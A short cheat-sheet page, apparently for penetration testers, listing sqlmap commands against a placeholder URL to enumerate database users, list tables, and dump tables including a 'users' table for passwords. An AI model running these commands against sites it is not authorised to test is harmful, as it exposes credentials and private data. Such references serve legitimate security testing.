> For the complete documentation index, see [llms.txt](https://cheats.philkeeble.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://cheats.philkeeble.com/web-app/sqlmap.md).

# SQLMap

## Users

```
sqlmap -u http://URL/page.php?id=3 --users
```

## Passwords

```
sqlmap -u http://URL/page.php?id=3 -dump -T users
```

## Tables

```
sqlmap -u http://URL/page.php?id=3 --tables

# Dump Info 

sqlmap -u http://URL/page.php?id=3 -D <DATABASE> -T <TABLE> --dump
```
